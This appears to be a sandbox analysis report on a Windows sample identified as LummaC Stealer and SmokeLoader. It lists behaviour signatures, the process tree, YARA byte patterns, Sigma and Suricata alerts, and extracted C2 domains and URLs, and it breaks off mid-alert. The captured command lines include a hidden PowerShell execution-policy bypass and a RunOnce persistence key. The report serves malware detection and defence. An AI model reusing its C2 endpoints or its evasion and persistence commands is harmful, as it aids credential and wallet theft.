Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1483386
MD5:	94267a284d656590e74246749da7f91c
SHA1:	bccb3bd1483e50641862412e152dc5c7b590f4e8
SHA256:	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd
Tags:	exe
Infos:

Detection

LummaC, Go Injector, LummaC Stealer, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Check for Windows Defender sandbox

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected Go Injector

Yara detected LummaC Stealer

Yara detected SmokeLoader

AI detected suspicious sample

Allocates memory in foreign processes

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Changes memory attributes in foreign processes to executable or writable

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Connects to a pastebin service (likely for C&C)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Creates a thread in another existing process (thread injection)

Creates autostart registry keys with suspicious names

Deletes itself after installation

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious ZIP file

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Reads the Security eventlog

Reads the System eventlog

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to detect virtual machines (SIDT)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6416 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 94267A284D656590E74246749DA7F91C)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

3530.exe (PID: 2860 cmdline: C:\Users\user\AppData\Local\Temp\3530.exe MD5: 2B3ECC21382E825D6FE0812A717717EB)

conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

7C81.exe (PID: 5268 cmdline: C:\Users\user\AppData\Local\Temp\7C81.exe MD5: D3785ED170CDB1F4784D3DFF3A61DAE0)

BitLockerToGo.exe (PID: 320 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

6E8A.exe (PID: 940 cmdline: C:\Users\user\AppData\Local\Temp\6E8A.exe MD5: B6A1C0998D0A7979C9EC17B8D5CF8A81)

6E8A.exe (PID: 6768 cmdline: "C:\Users\user\AppData\Local\Temp\6E8A.exe" -HOSTRUNAS MD5: B6A1C0998D0A7979C9EC17B8D5CF8A81)

powershell.exe (PID: 2136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

3530.exe (PID: 3196 cmdline: "C:\Users\user\AppData\Local\Temp\3530.exe" MD5: 2B3ECC21382E825D6FE0812A717717EB)

conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

3530.exe (PID: 1164 cmdline: "C:\Users\user\AppData\Local\Temp\3530.exe" MD5: 2B3ECC21382E825D6FE0812A717717EB)

conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sashibt (PID: 6768 cmdline: C:\Users\user\AppData\Roaming\sashibt MD5: 94267A284D656590E74246749DA7F91C)

sashibt (PID: 4072 cmdline: C:\Users\user\AppData\Roaming\sashibt MD5: 94267A284D656590E74246749DA7F91C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: LummaC

{"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "bOKHNM--"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\7C81.exe	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2333466076.000000000263D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x733c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000E.00000003.2985106102.0000000000830000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2706511521.00000000025E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000007.00000002.2706710751.0000000002660000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x74d4:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000E.00000003.3042842464.0000000000833000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000E.00000003.3044811089.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2095808025.0000000002550000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000000.2860245379.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
00000004.00000002.2333318255.00000000025E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000E.00000003.3018166351.000000000082F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2096146126.000000000270D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x752c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000E.00000003.2982362975.000000000082E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2960028925.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Process Memory Space: 7C81.exe PID: 5268	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 320	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 320	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.0.7C81.exe.7ff7d4c00000.0.unpack	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
10.2.7C81.exe.7ff7d4c00000.6.unpack	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\3530.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 1028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#7936_8yUscnjrUY

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\6E8A.exe, ParentImage: C:\Users\user\AppData\Local\Temp\6E8A.exe, ParentProcessId: 940, ParentProcessName: 6E8A.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 2136, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\6E8A.exe, ParentImage: C:\Users\user\AppData\Local\Temp\6E8A.exe, ParentProcessId: 940, ParentProcessName: 6E8A.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 2136, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\6E8A.exe, ParentImage: C:\Users\user\AppData\Local\Temp\6E8A.exe, ParentProcessId: 940, ParentProcessName: 6E8A.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 2136, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\3530.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 1028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#7936_8yUscnjrUY

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\sashibt, CommandLine: C:\Users\user\AppData\Roaming\sashibt, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\sashibt, NewProcessName: C:\Users\user\AppData\Roaming\sashibt, OriginalFileName: C:\Users\user\AppData\Roaming\sashibt, ParentCommandLine: , ParentImage: , ParentProcessId: 940, ProcessCommandLine: C:\Users\user\AppData\Roaming\sashibt, ProcessId: 6768, ProcessName: sashibt

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\6E8A.exe, ProcessId: 940, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v21r2jvc.u1m.ps1

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\6E8A.exe, ParentImage: C:\Users\user\AppData\Local\Temp\6E8A.exe, ParentProcessId: 940, ParentProcessName: 6E8A.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 2136, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T07:30:37.490057+0200
SID:	2054602
Source Port:	51836
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:32:12.539043+0200
SID:	2039103
Source Port:	51895
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.5 - Destination IP: 64.190.113.113

Timestamp:	2024-07-27T07:30:08.617650+0200
SID:	2019714
Source Port:	51808
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:11.104794+0200
SID:	2039103
Source Port:	51809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T07:30:48.763363+0200
SID:	2054602
Source Port:	51852
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T07:30:43.467871+0200
SID:	2054602
Source Port:	51846
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:32:21.963724+0200
SID:	2039103
Source Port:	51901
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T07:30:40.173710+0200
SID:	2048094
Source Port:	51841
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

GPL SHELLCODE x86 inc ebx NOOP - Source IP: 185.149.100.242 - Destination IP: 192.168.2.5

Timestamp:	2024-07-27T07:30:19.253091+0200
SID:	2101390
Source Port:	443
Destination Port:	51812
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:29.631223+0200
SID:	2039103
Source Port:	51819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO ACTIVEX Yahoo Messenger ActiveX Control Command Execution - Source IP: 104.26.3.16 - Destination IP: 192.168.2.5

Timestamp:	2024-07-27T07:30:38.680515+0200
SID:	2800584
Source Port:	443
Destination Port:	51837
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:12.626774+0200
SID:	2039103
Source Port:	51810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:04.950993+0200
SID:	2039103
Source Port:	51805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:32.774832+0200
SID:	2039103
Source Port:	51823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T07:30:38.198120+0200
SID:	2048094
Source Port:	51836
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:29:33.075227+0200
SID:	2039103
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 125.7.253.10

Timestamp:	2024-07-27T07:30:14.159695+0200
SID:	2039103
Source Port:	51811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET ADWARE_PUP Windows executable sent when remote host claims to send an image M2 - Source IP: 185.149.100.242 - Destination IP: 192.168.2.5

Timestamp:	2024-07-27T07:30:15.665655+0200
SID:	2020757
Source Port:	443
Destination Port:	51812
Protocol:	TCP
Classtype:	Possibly Unwanted Program Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:29:34.114716+0200
SID:	2039103
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:29:28.578828+0200
SID:	2039103
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T07:30:45.619692+0200
SID:	2054602
Source Port:	51848
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (liernessfornicsa .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-07-27T07:33:11.467557+0200
SID:	2054593
